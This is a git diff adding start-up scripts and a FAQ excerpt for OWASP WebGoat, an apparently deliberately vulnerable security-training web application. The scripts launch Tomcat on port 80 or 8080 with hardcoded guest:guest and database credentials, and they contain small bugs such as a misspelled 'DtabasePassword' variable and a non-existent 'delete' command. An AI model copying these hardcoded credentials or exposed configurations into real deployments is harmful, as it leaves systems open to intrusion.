+      <!-- Define a non-SSL HTTP/1.1 Connector on port 8080 --> 
+      <Connector address="10.20.20.123" port="80" 
+      ... 
+      <!-- Define a SSL HTTP/1.1 Connector on port 8443 --> 
+      <Connector address="10.20.20.123" port="443" 
+      .... 
+
+   where the 127.0.0.1 will be replaced by your IP. In this case
+   10.20.20.123
+
+
+Q. How do I solve lesson X?
+A. Subscribe to the WebGoat mailing list at owasp-webgoat@lists.owasp.org.
+   Post your question to owasp-webgoat@lists.owasp.org
+
+	
+
+Please send questions, comments, suggestions, bugs, etc to webgoat@owasp.org
\ No newline at end of file
diff --git a/main/webgoat for SQL Server.bat b/main/webgoat for SQL Server.bat
new file mode 100644
index 000000000..d88d8dd35
--- /dev/null
+++ b/main/webgoat for SQL Server.bat	
@@ -0,0 +1,34 @@
+@echo on
+
+
+@REM Clear the lib env var as it can hose tomcat
+SET lib= 
+
+@REM Make sure the webgoat DB is writable
+attrib -R .\tomcat\webapps\WebGoat\database\*.*
+
+@REM Set env vars for tomcat and java, use PWD as some machines don't have
+@REM \. on their path
+set PWD=%cd%
+set CATALINA_HOME=%PWD%\tomcat
+set JAVA_HOME=%PWD%\java
+
+@REM Configure environment variables to override web.xml
+SET DatabaseDriver=net.sourceforge.jtds.jdbc.Driver
+SET DatabaseConnectionString=jdbc:jtds:sqlserver://./webgoat;namedPipe=true;INSTANCE=WEBGOAT
+SET DatabaseUser=webgoat
+SET DtabasePassword=_webgoat
+
+delete .\tomcat\conf\server.xml
+copy .\tomcat\conf\server_80.xml .\tomcat\conf\server.xml
+
+@REM Run tomcat: must have quotes incase var has spaces in it
+call "%CATALINA_HOME%\bin\startup.bat" start
+
+echo 
+echo If the Tomcat DOS shell quit immediately, it is likely that 
+echo there is another service listening on port 80.
+echo
+
+
+
diff --git a/main/webgoat.bat b/main/webgoat.bat
new file mode 100644
index 000000000..885ccd849
--- /dev/null
+++ b/main/webgoat.bat
@@ -0,0 +1,25 @@
+@echo on
+
+
+@REM Clear the lib env var as it can hose tomcat
+SET lib= 
+
+@REM Make sure the webgoat DB is writable
+attrib -R .\tomcat\webapps\WebGoat\database\*.*
+
+@REM Set env vars for tomcat and java, use PWD as some machines don't have
+@REM \. on their path
+set PWD=%cd%
+set CATALINA_HOME=%PWD%\tomcat
+set JAVA_HOME=%PWD%\java
+
+delete .\tomcat\conf\server.xml
+copy .\tomcat\conf\server_80.xml .\tomcat\conf\server.xml
+
+@REM Run tomcat: must have quotes incase var has spaces in it
+call "%CATALINA_HOME%\bin\startup.bat" start
+
+echo 
+echo If the Tomcat DOS shell quit immediately, it is likely that 
+echo there is another service listening on port 80.
+echo
diff --git a/main/webgoat.sh b/main/webgoat.sh
new file mode 100644
index 000000000..25f26ea17
--- /dev/null
+++ b/main/webgoat.sh
@@ -0,0 +1,60 @@
+#! /bin/sh
+
+SYSTEM=`uname -s`
+CATALINA_HOME=./tomcat
+PATH=${PATH}:./tomcat/bin
+export CATALINA_HOME PATH
+
+chmod +x ./$CATALINA_HOME/bin/*.sh
+if [ $SYSTEM = "Darwin" ]; then
+        JAVA_HOME=/System/Library/Frameworks/JavaVM.framework/Versions/1.5/Home
+        export JAVA_HOME
+
+else
+
+is_java_1dot5() {
+        if [ "X$JAVA_HOME" != "X" -a -d $JAVA_HOME ]; then
+                $JAVA_HOME/bin/java -version 2>&1 | grep 'version \"1.5' >/dev/null
+                if [ $? -ne 0 ]; then
+                        echo "The JVM in \$JAVA_HOME isn't version 1.5."
+                        exit 1
+                fi
+        else
+                echo "Please set JAVA_HOME to a Java 1.5 JDK install"
+                exit 1
+        fi
+}
+
+is_java_1dot5
+
+fi
+
+case "$1" in
+	start80)
+		cp -f $CATALINA_HOME/conf/server_80.xml $CATALINA_HOME/conf/server.xml 
+		$CATALINA_HOME/bin/startup.sh
+		printf "\n  Open http://127.0.0.1/WebGoat/attack"
+		printf "\n  Username: guest"
+		printf "\n  Password: guest"
+		printf "\n  Or try http://guest:guest@127.0.0.1/WebGoat/attack \n\n\r"
+		sleep 2
+		tail -f $CATALINA_HOME/logs/catalina.out
+	;;
+	start8080)
+		cp -f $CATALINA_HOME/conf/server_8080.xml $CATALINA_HOME/conf/server.xml 
+		$CATALINA_HOME/bin/startup.sh
+		printf "\n  Open http://127.0.0.1:8080/WebGoat/attack"
+		printf "\n  Username: guest"
+		printf "\n  Password: guest"
+		printf "\n  Or try http://guest:guest@127.0.0.1:8080/WebGoat/attack \n\n\r"
+		sleep 2
+		tail -f $CATALINA_HOME/logs/catalina.out
+	;;
+	stop)
+		$CATALINA_HOME/bin/shutdown.sh
+	;;
+	*)
+		echo $"Usage: $prog {start8080|start80|stop}"
+		exit 1
+	;;
+esac
diff --git a/main/webgoat_8080.bat b/main/webgoat_8080.bat
new file mode 100644
index 000000000..a7f9dbb3f
--- /dev/null
+++ b/main/webgoat_8080.bat
@@ -0,0 +1,25 @@
+@echo on
+
+
+@REM Clear the lib env var as it can hose tomcat
+SET lib= 
+
+@REM Make sure the webgoat DB is writable
+attrib -R .\tomcat\webapps\WebGoat\database\*.*
+
+@REM Set env vars for tomcat and java, use PWD as some machines don't have
+@REM \. on their path
+set PWD=%cd%
+set CATALINA_HOME=%PWD%\tomcat
+set JAVA_HOME=%PWD%\java
+
+delete .\tomcat\conf\server.xml
+copy .\tomcat\conf\server_8080.xml .\tomcat\conf\server.xml
+
+@REM Run tomcat: must have quotes incase var has spaces in it
+call "%CATALINA_HOME%\bin\startup.bat" start
+
+echo 
+echo If the Tomcat DOS shell quit immediately, it is likely that 
+echo there is another service listening on port 80.
+echo
diff --git a/main/webscarab.bat b/main/webscarab.bat
new file mode 100644
index 000000000..9db235089
--- /dev/null
+++ b/main/webscarab.bat
@@ -0,0 +1,7 @@
+@echo off
+
+
+@REM Run webscarab
+@REM    - Assumes webscarab.properties file is in webscarab directory
+cd webscarab
+..\java\bin\javaw -Duser.home=.\ -jar webscarab.jar